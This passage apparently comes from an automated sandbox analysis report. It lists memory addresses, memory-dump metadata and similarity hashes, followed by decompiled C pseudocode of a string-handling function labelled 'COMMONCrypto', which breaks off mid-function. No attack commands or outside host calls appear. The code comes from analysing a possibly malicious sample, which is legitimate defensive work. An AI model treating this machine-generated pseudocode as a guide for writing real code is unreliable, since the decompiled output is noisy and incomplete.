0x008acbae
0x008acbb0
0x008acbb0
0x008acbb4
0x008acbb6
0x00000000
0x00000000
0x008acbb8
0x008acbb9
0x008acbbb
0x00000000
0x00000000
0x00000000
0x008acbbb
0x00000000
0x00000000
0x00000000
0x00000000
0x008acb4b
0x008acb4b
0x008acb4f
0x008acb51
0x00000000
0x00000000
0x008acb53
0x008acb54
0x008acb5a
0x00000000
0x00000000
0x00000000
0x008acb5a
0x00000000
0x008acb4b
0x008acd77
0x008acd7c
0x00000000
0x008acd7c
0x008acafb
0x008acafd
0x008acaff
0x00000000
0x00000000
0x008acb06
0x008acb06
0x008acb08
0x008acb08
0x008acb0c
0x008acb0e
0x00000000
0x00000000
0x008acb10
0x008acb11
0x008acb13
0x00000000
0x00000000
0x00000000
0x008acb13
0x00000000
0x00000000
0x00000000
0x00000000
0x008acade
0x008acade
0x008acae2
0x008acae4
0x00000000
0x00000000
0x008acae6
0x008acae7
0x008acaed
0x00000000
0x00000000
0x00000000
0x008acaed
0x00000000
0x008acade
0x008acd83
0x008acd88
0x00000000
0x008acd88
0x008aca8f
0x008aca91
0x008aca93
0x00000000
0x00000000
0x008aca95
0x008aca99
0x008aca9b
0x008aca9b
0x008aca9f
0x008acaa1
0x00000000
0x00000000
0x008acaa3
0x008acaa4
0x008acaa6
0x00000000
0x00000000
0x00000000
0x008acaa6
0x00000000
0x008aca9b
0x008acd8f
0x008acd93
0x008acd97
0x008acd9b
0x008acdad
0x008acdad
0x008acdaf
0x008acdb1
0x00000000
0x00000000
0x008acdb3
0x008acdb3
0x008acdb5
0x008acdb7
0x008ace2e
0x008ace2e
0x008ace32
0x008ace36
0x008ace3a
0x008ace3c
0x00000000
0x00000000
0x008ace42
0x008ace43
0x008ace49
0x00000000
0x00000000
0x008ace4b
0x008ace4f
0x008ace53
0x008ace53
0x008ace58
0x008ace58
0x008ace5c
0x008ace5c
0x008ace5e
0x008ace62
0x008ace66
0x008ace66
0x008ace6e
0x008ace71
0x008ace75
0x008ace78
0x008ace7b
0x008ace7e
0x008ace84
0x008ace8a
0x008ace8d
0x008ace90
0x00000000
0x00000000
0x008ace94
0x008ace96
0x008acea2
0x008acea2
0x008acea5
0x008acea5
0x008acea7
0x008aceab
0x008aceab
0x008acead
0x00000000
0x00000000
0x00000000
0x008acead
0x008ace98
0x008ace99
0x008ace9d
0x00000000
0x00000000
0x00000000
0x008ace9d
0x008aceec
0x008acef4
0x008acefa
0x008acefa
0x008acefd
0x008acf4b
0x008acf4b
0x008acf4f
0x00000000
0x008acf4f
0x008acf03
0x008acf05
0x00000000
0x00000000
0x008acf07
0x008acf0b
0x008acf0b
0x008acf0d
0x008acf11
0x008acf15
0x008acf15
0x008acf1f
0x008acf22
0x008acf28
0x008acf32
0x008acf35
0x008acf38
0x00000000
0x00000000
0x008acf42
0x008acf44
0x00000000
0x00000000
0x00000000
0x008acf46
0x008acda1
0x008acda5
0x008acda9
0x008acdad
0x008acdaf
0x008acdb1
0x00000000
0x00000000
0x00000000
0x008acdb1
0x008acf58
0x008acf5c
0x008aced3
0x008aced3
0x008aced5
0x00000000
0x00000000
0x008acedb
0x00000000
0x00000000
0x008acee1
0x008acee5
0x008acee7
0x00000000
0x008acee7
0x008acdb9
0x008acdbd
0x008acdbf
0x008acdc3
0x008acdc7
0x008acdcb
0x008acdcd
0x00000000
0x00000000
0x008acdd3
0x008acdd4
0x008acdd6
0x00000000
0x00000000
0x008acdd8
0x008acddc
0x008acde0
0x00000000
0x008acde0
0x008acec7
0x008acecb
0x008acecf
0x00000000
0x008acde4
0x008acdf0
0x008acdf4
0x008acdf4
0x008acdfa
0x008acdfe
0x008acdfe
0x008ace03
0x008ace07
0x008ace0b
0x008ace0d
0x00000000
0x00000000
0x008ace13
0x008ace16
0x008ace18
0x00000000
0x00000000
0x008ace1a
0x008ace22
0x008ace26
0x008ace2c
0x00000000
0x00000000
0x00000000
0x008ace2c
0x008acf67
0x008acf6c
0x008acf70
0x008acf76
0x00000000
0x008acf76
0x008acdad
0x008aceb3
0x008aceb3
0x008aceb6
0x008aceba
0x008acebe
0x00000000
0x008acebe
0x008ac9fc
0x008ac9fd
0x008aca00
0x00000000
0x00000000
0x00000000
0x008aca00
0x008acf7f
0x008acf87
0x008acf8d
0x008acf8d
0x008acf90
0x00000000
0x00000000
0x008acf9a
0x008acf9c
0x00000000
0x00000000
0x008acfa2
0x008acfa6
0x008acfa6
0x008acfa8
0x008acfac
0x008acfb0
0x008acfb0
0x008acfba
0x008acfbd
0x008acfc3
0x008acfcd
0x008acfd0
0x008acfd3
0x00000000
0x00000000
0x008acfdd
0x008acfdf
0x00000000
0x00000000
0x00000000
0x008acfe1
0x008ac8fe
0x008ac902
0x008ac906
0x00000000
0x008ac906
0x008acfe6
0x008acfea
0x008acd50
0x008acd50
0x008acd52
0x00000000
0x00000000
0x008acd58
0x00000000
0x00000000
0x008acd5e
0x008acd62
0x00000000
0x008acd62
0x008ac916
0x008ac91a
0x008ac91c
0x008ac920
0x008ac924
0x008ac928
0x008ac92a
0x00000000
0x00000000
0x008ac930
0x008ac931
0x008ac933
0x00000000
0x00000000
0x008ac935
0x008ac939
0x008ac93d
0x00000000
0x008ac93d
0x008acd44
0x008acd48
0x008acd4c
0x00000000
0x008ac941
0x008ac94d
0x008ac951
0x008ac951
0x008ac957
0x008ac95b
0x008ac95b
0x008ac960
0x008ac964
0x008ac968
0x008ac96a
0x00000000
0x00000000
0x008ac970
0x008ac973
0x008ac975
0x00000000
0x00000000
0x008ac977
0x008ac97f
0x008ac983
0x008ac989
0x00000000
0x00000000
0x00000000
0x008ac989
0x008acff5
0x008acffa
0x008acffe
0x008ad004
0x00000000
0x008ad004
0x008ac90a
0x00000000
0x008ac768
0x008ac704
0x008ac707
0x008ac70a
0x008ac70c
0x00000000
0x00000000
0x008ac70e
0x008ac70e
0x008ac710
0x008ac710
0x008ac711
0x008ac716
0x008ac71b
0x008ac71d
0x00000000
0x00000000
0x008ac71f
0x008ac723
0x008ac727
0x008ac729
0x00000000
0x00000000
0x00000000
0x008ac729
0x00000000
0x008ac710
0x008ac6fe
0x008ac6b1
0x00000000
0x008ac6b1
0x008ac623
0x008ac623
0x008ac626
0x008ac646
0x008ac64a
0x008ac656
0x008ac656
0x008ac65c
0x008ac65c
0x008ac661
0x008ac665
0x008ac669
0x008ac66b
0x00000000
0x00000000
0x008ac671
0x008ac674
0x008ac676
0x00000000
0x00000000
0x008ac678
0x008ac67e
0x008ac695
0x008ac695
0x008ac69a
0x00000000
0x00000000
0x00000000
0x00000000
0x008ac680
0x008ac680
0x008ac684
0x008ac686
0x00000000
0x00000000
0x008ac68c
0x008ac68d
0x008ac693
0x00000000
0x00000000
0x00000000
0x008ac693
0x008ac8ab
0x008ac8ab
0x008ac8ae
0x008ac8be
0x008ac8b0
0x008ac8b2
0x008ac8b5
0x008ac8b5
0x00000000
0x008ac8ae
0x008ad00d
0x008ad012
0x00000000
0x008ad012
0x008ac628
0x008ac62a
0x008ac62c
0x00000000
0x00000000
0x008ac633
0x008ac633
0x008ac635
0x008ac635
0x008ac639
0x008ac63b
0x00000000
0x00000000
0x008ac641
0x008ac642
0x008ac644
0x00000000
0x00000000
0x00000000
0x008ac644
0x00000000
0x008ac635
0x008ac610
0x00000000
0x008ac610
0x008ac5c1
0x008ac5ea
0x008ac5ea
0x008ac5ec
0x008ac5ed
0x008ac5f2
0x00000000
0x008ac5f2
0x008ac5c3
0x008ac5c6
0x008ac5cb
0x00000000
0x00000000
0x008ac5cf
0x008ac5cf
0x008ac5d0
0x008ac5d5
0x008ac5dc
0x00000000
0x00000000
0x008ac5de
0x008ac5e2
0x008ac5e8
0x00000000
0x00000000
0x00000000
0x008ac5e8
0x00000000

Strings

@, xrefs: 008AC600

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 34e3e757357182d4be67d558aec357958c2c3175704b9db7323992076a550c51
Instruction ID: 1684778e64cac7474c9af70f53877a372903c1268246ba726901f2cc9a14b7e2
Opcode Fuzzy Hash: 34e3e757357182d4be67d558aec357958c2c3175704b9db7323992076a550c51
Instruction Fuzzy Hash: C162F175A047168BE7148F29C48022AB7E2FFDA724F288B2DE895D77A4E734DD41C781

Uniqueness

Uniqueness Score: -1.00%

Function 008B2E60, Relevance: 2.0, Strings: 1, Instructions: 797
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E008B2E60(signed int __ecx, void* __eflags, signed int _a4, char _a8) {
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				char* _t230;
				signed int _t231;
				signed int* _t237;
				char* _t238;
				void* _t245;
				signed int _t246;
				char _t249;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				void* _t257;
				void* _t258;
				signed int _t262;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t268;
				char _t271;
				signed int _t273;
				signed int _t279;
				signed int _t280;
				signed int _t283;
				signed int _t284;
				void* _t286;
				void* _t288;
				signed int _t292;
				void* _t295;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				signed int _t308;
				signed int _t310;
				signed int _t311;
				char _t312;
				char _t313;
				char _t314;
				char _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				signed int _t329;
				void* _t330;
				signed int _t331;
				signed int _t332;
				signed int _t335;
				signed int _t336;
				void* _t337;
				signed int _t340;
				void* _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				char* _t347;
				signed int _t350;
				signed int _t352;
				void* _t355;
				signed int _t357;
				char _t359;
				signed int _t362;
				signed int _t363;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t379;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t386;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				char _t392;
				signed int _t395;
				signed int _t400;
				char _t402;
				char _t403;
				char _t404;
				signed int _t406;
				unsigned int _t411;
				signed int _t413;
				signed int _t415;
				signed int _t416;
				signed int _t421;
				signed int _t422;
				signed int _t433;
				signed int _t434;
				signed int _t435;
				signed int _t441;
				signed int _t443;
				signed int _t449;
				signed int _t450;
				signed int _t452;
				signed int _t461;
				signed int _t465;
				signed int _t466;
				signed int _t468;
				signed int _t469;
				signed int _t478;
				signed int _t482;
				void* _t485;

				_v56 = 0;
				_t449 = __ecx;
				_v52 = 0;
				_push(0x40);
				_t406 = E008A1030();
				_t485 = (_t482 & 0xfffffff0) - 0x34 + 4;
				_t230 = _v56;
				if(_t230 == 0) {
					 *_t406 = 0;
					L8:
					_t231 = _a8;
					_v52 = 0x40;
					_v56 = _t406;
					if(_t231 != 0) {
						__eflags = _t406;
						if(_t406 == 0) {
							_t310 = 0x40;
							_t283 = 0;
							L22:
							_t20 = _t283 + 2; // 0x80000001
							_t341 = _t20;
							__eflags = _t341 - 0x40;
							_t342 =  <=  ? 0x40 : _t341;
							__eflags = _t310 - _t342;
							if(_t310 < _t342) {
								_t411 = (_t342 >> 5 >> 0x1a) + _t342 >> 6;
								_t343 = _t342 & 0x8000003f;
								__eflags = _t343;
								if(_t343 < 0) {
									_t343 = (_t343 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t343;
								}
								__eflags = _t343;
								_t413 = _t411 + (0 | _t343 > 0x00000000) << 6;
								_push(_t413);
								_t311 = E008A1030();
								_t485 = _t485 + 4;
								_t344 = _v56;
								__eflags = _t344;
								if(_t344 == 0) {
									 *_t311 = 0;
									goto L35;
								} else {
									__eflags = _t311;
									if(_t311 == 0) {
										L33:
										_push(1);
										_push(_t344);
										_v68 = _t311;
										E008A10B0();
										_t311 = _v68;
										_t485 = _t485 + 8;
										L35:
										_v52 = _t413;
										_v56 = _t311;
										L36:
										 *((char*)(_t311 + _t283)) = _a8;
										_t237 =  &_v56;
										 *((char*)(_t283 +  *_t237 + 1)) = 0;
										L37:
										_t238 =  *_t237;
										_v28 = _t238;
										_t284 = _a4;
										if(_t238 == 0) {
											L39:
											_push(0x40);
											 *_t284 = 0;
											 *(_t284 + 4) = 0;
											_t450 = E008A1030();
											_t485 = _t485 + 4;
											_t347 =  *_t284;
											if(_t347 == 0) {
												 *_t450 = 0;
												L61:
												 *_t284 = _t450;
												 *(_t284 + 4) = 0x40;
												L62:
												_push(1);
												_push(_v56);
												E008A10B0();
												_v56 = 0;
												_v52 = 0;
												return _t284;
											}
											if(_t450 == 0) {
												L45:
												_push(1);
												_push(_t347);
												E008A10B0();
												_t485 = _t485 + 8;
												goto L61;
											}
											_t312 =  *_t347;
											 *_t450 = _t312;
											if(_t312 == 0) {
												goto L45;
											}
											_t415 = 0;
											while(1) {
												_t415 = _t415 + 1;
												_t313 =  *((char*)(_t347 + _t415 * 2 - 1));
												 *((char*)(_t450 + _t415 * 2 - 1)) = _t313;
												if(_t313 == 0) {
													goto L45;
												}
												_t314 =  *((char*)(_t347 + _t415 * 2));
												 *((char*)(_t450 + _t415 * 2)) = _t314;
												if(_t314 != 0) {
													continue;
												}
												goto L45;
											}
											goto L45;
										}
										_t315 =  *_t238;
										_v48 = _t315;
										if(_t315 != 0) {
											_t350 =  *_t449;
											_v60 = _t350;
											__eflags = _t350;
											if(_t350 == 0) {
												L53:
												_push(0x40);
												 *_t284 = 0;
												 *(_t284 + 4) = 0;
												_t450 = E008A1030();
												_t485 = _t485 + 4;
												_t352 =  *_t284;
												__eflags = _t352;
												if(_t352 == 0) {
													 *_t450 = 0;
													goto L61;
												}
												__eflags = _t450;
												if(_t450 == 0) {
													L59:
													_push(1);
													_push(_t352);
													E008A10B0();
													_t485 = _t485 + 8;
													goto L61;
												}
												_t316 =  *_t352;
												 *_t450 = _t316;
												__eflags = _t316;
												if(_t316 == 0) {
													goto L59;
												}
												_t416 = 0;
												__eflags = 0;
												while(1) {
													_t416 = _t416 + 1;
													_t317 =  *((char*)(_t352 + _t416 * 2 - 1));
													 *(_t450 + _t416 * 2 - 1) = _t317;
													__eflags = _t317;
													if(_t317 == 0) {
														goto L59;
													}
													_t318 =  *((char*)(_t352 + _t416 * 2));
													 *(_t450 + _t416 * 2) = _t318;
													__eflags = _t318;
													if(_t318 != 0) {
														continue;
													}
													goto L59;
												}
												goto L59;
											}
											__eflags =  *_t350;
											if( *_t350 == 0) {
												goto L53;
											}
											_t417 = _t315;
											_t319 = _t350;
											_t63 = _t417 - 0x41; // -65
											_t452 = _t63;
											_v64 = _t452;
											__eflags = _t452 - 0x19;
											_t65 = _t417 + 0x20; // 0x20
											_t354 =  >  ? _t315 : _t65;
											_t245 =  >  ? _t315 : _t65;
											_t355 = 0;
											__eflags = 0;
											while(1) {
												_t286 =  *_t319;
												__eflags = _t286 - 0x41 - 0x19;
												_t287 =  <=  ? _t286 + 0x20 : _t286;
												__eflags = ( <=  ? _t286 + 0x20 : _t286) - _t245;
												if(( <=  ? _t286 + 0x20 : _t286) == _t245) {
													break;
												}
												_t355 = _t355 + 1;
												_t319 = _t319 + 1;
												_t300 = _v60;
												__eflags =  *((char*)(_t355 + _t300));
												if( *((char*)(_t355 + _t300)) != 0) {
													continue;
												}
												L52:
												_t284 = _a4;
												goto L53;
											}
											_t284 = _a4;
											__eflags = _t319;
											if(_t319 == 0) {
												goto L53;
											}
											_t357 = _v28 & 0x0000000f;
											asm("pxor xmm0, xmm0");
											_t421 =  ~_t357 + 0x10;
											__eflags = _t421;
											_v32 = _t421;
											_v40 = _v48 + 0x20;
											_t246 = _t421;
											do {
												_t422 = _t357;
												__eflags = _t357;
												if(_t357 == 0) {
													L69:
													_t461 =  ~( ~_t422 + 0x0000000f & 0x0000000f) + 0x7fffffff;
													__eflags = _t461;
													while(1) {
														asm("movdqu xmm1, [eax+edi]");
														asm("pcmpeqb xmm1, xmm0");
														asm("pmovmskb ebx, xmm1");
														__eflags = _t284;
														if(_t284 != 0) {
															break;
														}
														_t422 = _t422 + 0x10;
														__eflags = _t422 - _t461;
														if(_t422 < _t461) {
															continue;
														}
														__eflags = _t461 - 0x7fffffff;
														if(_t461 >= 0x7fffffff) {
															L76:
															_t461 = 0x7fffffff;
															L77:
															_v68 = _t461;
															_t288 = 0;
															__eflags = 0;
															_v44 = _t357;
															while(1) {
																_t249 =  *((char*)(_t288 + _t319));
																_t359 =  *((char*)(_t288 + _v28));
																__eflags = _t249 - 0x61 - 0x19;
																_t250 =  <=  ? _t249 - 0x20 : _t249;
																__eflags = _t359 - 0x61 - 0x19;
																_t251 =  <=  ? _t249 - 0x20 : _t249;
																_t360 =  <=  ? _t359 - 0x20 : _t359;
																_t361 =  <=  ? _t359 - 0x20 : _t359;
																__eflags = _t251 - ( <=  ? _t359 - 0x20 : _t359);
																if(__eflags < 0 || __eflags > 0) {
																	break;
																}
																__eflags = _t251;
																if(_t251 == 0) {
																	L82:
																	_t357 = _v44;
																	_t466 = _v40;
																	_t284 = _a4;
																	L83:
																	__eflags = _t319;
																	if(_t319 == 0) {
																		goto L53;
																	}
																	_v44 = _t357;
																	while(1) {
																		L85:
																		_t254 = _t319;
																		_t292 = _t319 + 1;
																		__eflags = _t292;
																		if(_t292 == 0) {
																			break;
																		}
																		__eflags =  *(_t319 + 1);
																		if( *(_t319 + 1) == 0) {
																			break;
																		}
																		__eflags = _v64 - 0x19;
																		_t388 =  <=  ? _t466 : _v48;
																		__eflags = _t388;
																		_t389 = _t388;
																		_v36 = _t254;
																		_v40 = _t466;
																		while(1) {
																			_t319 = _t319 + 1;
																			_t292 = _t292 + 1;
																			_t266 =  *_t319 & 0x000000ff;
																			_t466 =  *((char*)(_t292 - 1)) + 0xffffffbf;
																			__eflags = _t466 - 0x19;
																			_t267 =  <=  ? _t266 + 0x20 : _t266;
																			__eflags = ( <=  ? _t266 + 0x20 : _t266) - _t389;
																			if(( <=  ? _t266 + 0x20 : _t266) == _t389) {
																				break;
																			}
																			__eflags =  *_t292;
																			if( *_t292 != 0) {
																				continue;
																			}
																			L90:
																			_t254 = _v36;
																			_t365 = _v44;
																			_t284 = _a4;
																			L91:
																			__eflags = _t365;
																			if(_t365 == 0) {
																				L95:
																				_t325 =  ~( ~_t365 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																				__eflags = _t325;
																				while(1) {
																					asm("movdqu xmm1, [edi+edx]");
																					asm("pcmpeqb xmm1, xmm0");
																					asm("pmovmskb esi, xmm1");
																					__eflags = _t466;
																					if(_t466 != 0) {
																						break;
																					}
																					_t365 = _t365 + 0x10;
																					__eflags = _t365 - _t325;
																					if(_t365 < _t325) {
																						continue;
																					}
																					__eflags = _t325 - 0x7fffffff;
																					if(_t325 >= 0x7fffffff) {
																						L102:
																						_t325 = 0x7fffffff;
																						L103:
																						_t468 = _v60 & 0x0000000f;
																						__eflags = _t468;
																						if(_t468 == 0) {
																							L107:
																							_t433 =  ~( ~_t468 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																							__eflags = _t433;
																							while(1) {
																								asm("movdqu xmm1, [ebx+esi]");
																								asm("pcmpeqb xmm1, xmm0");
																								asm("pmovmskb edx, xmm1");
																								__eflags = _t365;
																								if(_t365 != 0) {
																									break;
																								}
																								_t468 = _t468 + 0x10;
																								__eflags = _t468 - _t433;
																								if(_t468 < _t433) {
																									continue;
																								}
																								_t284 = _a4;
																								__eflags = _t433 - 0x7fffffff;
																								if(_t433 >= 0x7fffffff) {
																									L114:
																									_t433 = 0x7fffffff;
																									L115:
																									_t366 = _v60;
																									_t256 = _t254 - _t366 + _t325;
																									_t326 = 0;
																									__eflags = _t256;
																									 *_t284 = 0;
																									_t257 =  <=  ? 0 : _t256;
																									__eflags = _t433 - _t257;
																									 *(_t284 + 4) = 0;
																									_t258 =  <  ? _t433 : _t257;
																									_t434 = _t433 - _t258;
																									_t367 = _t366 + _t258;
																									__eflags = _t367;
																									_v64 = _t367;
																									if(_t367 == 0) {
																										L151:
																										_push(0x40);
																										_t450 = E008A1030();
																										_t485 = _t485 + 4;
																										_t368 =  *_t284;
																										__eflags = _t368;
																										if(_t368 == 0) {
																											 *_t450 = 0;
																											goto L61;
																										}
																										__eflags = _t450;
																										if(_t450 == 0) {
																											L157:
																											_push(1);
																											_push(_t368);
																											E008A10B0();
																											_t485 = _t485 + 8;
																											goto L61;
																										}
																										_t327 =  *_t368;
																										 *_t450 = _t327;
																										__eflags = _t327;
																										if(_t327 == 0) {
																											goto L157;
																										}
																										_t435 = 0;
																										__eflags = 0;
																										while(1) {
																											_t435 = _t435 + 1;
																											_t328 =  *((char*)(_t368 + _t435 * 2 - 1));
																											 *(_t450 + _t435 * 2 - 1) = _t328;
																											__eflags = _t328;
																											if(_t328 == 0) {
																												goto L157;
																											}
																											_t329 =  *((char*)(_t368 + _t435 * 2));
																											 *(_t450 + _t435 * 2) = _t329;
																											__eflags = _t329;
																											if(_t329 != 0) {
																												continue;
																											}
																											goto L157;
																										}
																										goto L157;
																									}
																									_t369 = _v60;
																									__eflags =  *(_t369 + _t258);
																									if( *(_t369 + _t258) == 0) {
																										goto L151;
																									}
																									__eflags = _t434;
																									if(_t434 != 0) {
																										L130:
																										_t144 = _t434 + 1; // 0x80000000
																										_t330 = _t144;
																										__eflags = _t330 - 0x40;
																										_t331 =  <=  ? 0x40 : _t330;
																										__eflags = _t331;
																										if(_t331 > 0) {
																											_v68 = (_t331 >> 5 >> 0x1a) + _t331 >> 6;
																											_t332 = _t331 & 0x8000003f;
																											__eflags = _t332;
																											if(_t332 < 0) {
																												_t332 = (_t332 - 0x00000001 | 0xffffffc0) + 1;
																												__eflags = _t332;
																											}
																											__eflags = _t332;
																											_t335 = _v68 + (0 | _t332 > 0x00000000) << 6;
																											_v68 = _t335;
																											_push(_t335);
																											_t469 = E008A1030();
																											_t485 = _t485 + 4;
																											_t336 =  *_t284;
																											__eflags = _t336;
																											if(_t336 == 0) {
																												 *_t469 = 0;
																												goto L143;
																											} else {
																												__eflags = _t469;
																												if(_t469 == 0) {
																													L141:
																													_push(1);
																													_push(_t336);
																													E008A10B0();
																													_t485 = _t485 + 8;
																													L143:
																													 *(_t284 + 4) = _v68;
																													 *_t284 = _t469;
																													L144:
																													__eflags = _t469;
																													if(_t469 == 0) {
																														goto L62;
																													}
																													_t262 = _v64;
																													_t337 = 0;
																													while(1) {
																														_t379 =  *_t262;
																														_t337 = _t337 + 1;
																														 *_t469 = _t379;
																														__eflags = _t434;
																														if(_t434 == 0) {
																															goto L149;
																														}
																														__eflags = _t337 - _t434;
																														if(_t337 == _t434) {
																															 *(_t469 + 1) = 0;
																															goto L62;
																														}
																														L149:
																														__eflags = _t379;
																														if(_t379 == 0) {
																															goto L62;
																														}
																														_t469 = _t469 + 1;
																														_t262 = _t262 + 1;
																														__eflags = _t262;
																													}
																												}
																												_t380 =  *_t336;
																												 *_t469 = _t380;
																												__eflags = _t380;
																												if(_t380 == 0) {
																													goto L141;
																												}
																												_t381 = 0;
																												__eflags = 0;
																												while(1) {
																													_t381 = _t381 + 1;
																													_t264 =  *((char*)(_t336 + _t381 * 2 - 1));
																													 *(_t469 + _t381 * 2 - 1) = _t264;
																													__eflags = _t264;
																													if(_t264 == 0) {
																														break;
																													}
																													_t265 =  *((char*)(_t336 + _t381 * 2));
																													 *(_t469 + _t381 * 2) = _t265;
																													__eflags = _t265;
																													if(_t265 != 0) {
																														continue;
																													}
																													break;
																												}
																												_t284 = _a4;
																												goto L141;
																											}
																										}
																										_t469 = 0;
																										goto L144;
																									}
																									_t382 = _t369 + _t258;
																									_v60 = _t382;
																									_t383 = _t382 & 0x0000000f;
																									__eflags = _t383;
																									if(_t383 == 0) {
																										L122:
																										_t434 =  ~( ~_t383 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																										__eflags = _t434;
																										while(1) {
																											asm("movdqu xmm1, [esi+edx]");
																											asm("pcmpeqb xmm1, xmm0");
																											asm("pmovmskb ecx, xmm1");
																											__eflags = _t326;
																											if(_t326 != 0) {
																												break;
																											}
																											_t383 = _t383 + 0x10;
																											__eflags = _t383 - _t434;
																											if(_t383 < _t434) {
																												continue;
																											}
																											__eflags = _t434 - 0x7fffffff;
																											if(_t434 >= 0x7fffffff) {
																												L129:
																												_t434 = 0x7fffffff;
																												goto L130;
																											}
																											_t384 = _v60;
																											while(1) {
																												__eflags =  *((char*)(_t434 + _t384));
																												if( *((char*)(_t434 + _t384)) == 0) {
																													goto L130;
																												}
																												_t434 = _t434 + 1;
																												__eflags = _t434 - 0x7fffffff;
																												if(_t434 < 0x7fffffff) {
																													continue;
																												}
																												goto L129;
																											}
																											goto L130;
																										}
																										asm("bsf edi, ecx");
																										_t434 = _t434 + _t383;
																										goto L130;
																									}
																									_t434 = 0;
																									_t326 = _v60;
																									_t383 =  ~_t383 + 0x10;
																									__eflags = _t383;
																									while(1) {
																										__eflags =  *((char*)(_t434 + _t326));
																										if( *((char*)(_t434 + _t326)) == 0) {
																											goto L130;
																										}
																										_t434 = _t434 + 1;
																										__eflags = _t434 - _t383;
																										if(_t434 < _t383) {
																											continue;
																										}
																										goto L122;
																									}
																									goto L130;
																								}
																								_t386 = _v60;
																								while(1) {
																									__eflags =  *((char*)(_t433 + _t386));
																									if( *((char*)(_t433 + _t386)) == 0) {
																										goto L115;
																									}
																									_t433 = _t433 + 1;
																									__eflags = _t433 - 0x7fffffff;
																									if(_t433 < 0x7fffffff) {
																										continue;
																									}
																									goto L114;
																								}
																								goto L115;
																							}
																							asm("bsf edi, edx");
																							_t284 = _a4;
																							_t433 = _t433 + _t468;
																							goto L115;
																						}
																						_t433 = 0;
																						_t365 = _v60;
																						_t468 =  ~_t468 + 0x10;
																						__eflags = _t468;
																						while(1) {
																							__eflags =  *((char*)(_t433 + _t365));
																							if( *((char*)(_t433 + _t365)) == 0) {
																								goto L115;
																							}
																							_t433 = _t433 + 1;
																							__eflags = _t433 - _t468;
																							if(_t433 < _t468) {
																								continue;
																							}
																							goto L107;
																						}
																						goto L115;
																					}
																					_t365 = _v28;
																					while(1) {
																						__eflags =  *(_t325 + _t365);
																						if( *(_t325 + _t365) == 0) {
																							goto L103;
																						}
																						_t325 = _t325 + 1;
																						__eflags = _t325 - 0x7fffffff;
																						if(_t325 < 0x7fffffff) {
																							continue;
																						}
																						goto L102;
																					}
																					goto L103;
																				}
																				asm("bsf ecx, esi");
																				_t325 = _t325 + _t365;
																				goto L103;
																			}
																			_t365 = _v32;
																			_t325 = 0;
																			__eflags = 0;
																			_t441 = _v28;
																			_t466 = _t365;
																			while(1) {
																				__eflags =  *((char*)(_t325 + _t441));
																				if( *((char*)(_t325 + _t441)) == 0) {
																					goto L103;
																				}
																				_t325 = _t325 + 1;
																				__eflags = _t325 - _t466;
																				if(_t325 < _t466) {
																					continue;
																				}
																				goto L95;
																			}
																			goto L103;
																		}
																		_t254 = _v36;
																		_t466 = _v40;
																		__eflags = _t319;
																		if(_t319 == 0) {
																			break;
																		}
																		_v36 = _t254;
																		_v40 = _t466;
																		_t390 = _v44;
																		_t268 = _v32;
																		do {
																			_t443 = _t390;
																			__eflags = _t390;
																			if(_t390 == 0) {
																				L169:
																				_t478 =  ~( ~_t443 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																				__eflags = _t478;
																				while(1) {
																					asm("movdqu xmm1, [eax+edi]");
																					asm("pcmpeqb xmm1, xmm0");
																					asm("pmovmskb ebx, xmm1");
																					__eflags = _t292;
																					if(_t292 != 0) {
																						break;
																					}
																					_t443 = _t443 + 0x10;
																					__eflags = _t443 - _t478;
																					if(_t443 < _t478) {
																						continue;
																					}
																					__eflags = _t478 - 0x7fffffff;
																					if(_t478 >= 0x7fffffff) {
																						L176:
																						_t478 = 0x7fffffff;
																						L177:
																						_v68 = _t478;
																						_t295 = 0;
																						__eflags = 0;
																						_v44 = _t390;
																						while(1) {
																							_t271 =  *((char*)(_t295 + _t319));
																							_t392 =  *((char*)(_t295 + _v28));
																							__eflags = _t271 - 0x61 - 0x19;
																							_t272 =  <=  ? _t271 - 0x20 : _t271;
																							__eflags = _t392 - 0x61 - 0x19;
																							_t273 =  <=  ? _t271 - 0x20 : _t271;
																							_t393 =  <=  ? _t392 - 0x20 : _t392;
																							_t394 =  <=  ? _t392 - 0x20 : _t392;
																							__eflags = _t273 - ( <=  ? _t392 - 0x20 : _t392);
																							if(__eflags < 0 || __eflags > 0) {
																								break;
																							}
																							__eflags = _t273;
																							if(_t273 == 0) {
																								L182:
																								_t254 = _v36;
																								_t466 = _v40;
																								L183:
																								__eflags = _t319;
																								if(_t319 != 0) {
																									goto L85;
																								}
																								goto L184;
																							}
																							_t295 = _t295 + 1;
																							__eflags = _t295 - _v68;
																							if(_t295 < _v68) {
																								continue;
																							}
																							goto L182;
																						}
																						_t365 = _v44;
																						_t466 = _t319 + 1;
																						__eflags = _t466;
																						if(_t466 == 0) {
																							goto L192;
																						}
																						__eflags = _v64 - 0x19;
																						_t297 =  <=  ? _v40 : _v48;
																						_t292 =  <=  ? _v40 : _v48;
																						__eflags =  *(_t319 + 1);
																						if( *(_t319 + 1) == 0) {
																							goto L192;
																						}
																						_v44 = _t365;
																						while(1) {
																							_t319 = _t319 + 1;
																							_t466 = _t466 + 1;
																							_t395 =  *_t319 & 0x000000ff;
																							__eflags =  *((char*)(_t466 - 1)) + 0xffffffbf - 0x19;
																							_t396 =  <=  ? _t395 + 0x20 : _t395;
																							__eflags = ( <=  ? _t395 + 0x20 : _t395) - _t292;
